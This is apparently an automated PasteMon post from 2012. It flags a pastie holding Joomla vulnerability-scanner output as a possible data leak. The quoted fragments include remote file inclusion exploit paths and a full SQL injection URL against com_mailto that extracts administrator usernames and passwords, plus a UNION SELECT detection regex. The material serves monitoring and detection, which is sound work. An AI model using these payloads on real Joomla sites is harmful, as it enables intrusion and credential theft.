Potential leak of data: Remote File Inclusion
Detected 1 occurrence(s) of ‘remote file inclusion’:
Crafted URL can disclose absolute path Vulnerable? No # 12 Info -> Core: User redirected Spamming Vulnerability Versions effected: Joomla! 1.5.3 <= Check: /?1.5.3-spam Exploit: User redirect spam Vulnerable? No # 13 Info -> Core: joomla.php Remote File Inclusion Vulnerability Versions effected: 1.0.0 Check: /includes/joomla.php Exploit: /includes/joomla.php?includepath= Vulnerable? No # 14 Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability Versions effected: 1.0.13 <= Check: /admini
Detected 2 occurrence(s) of ‘[a-zA-Z0-9\-_]=.*UNION\+SELECT’:
xploit: /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path= Vulnerable? No # 24 Info -> CoreComponent: MailTo SQL Injection Vulnerability Versions effected: N/A Check: /components/com_mailto/ Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1 Vulnerable? No # 25 Info -> CoreComponent: com_content Blind SQL Injection Vulnerability Versions effected: Joomla! 1.5.0 RC3 Chec
If you find the content of this pastie suspicious or inappropriate, highlight the relevant piece of text and press Shift + E or click here to notify us.
This entry was posted on Monday, June 25th, 2012 at 04:50 and is filed under PasteMon. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.
Comments are closed.
Thank you very much for your report. We will process it as soon as possible!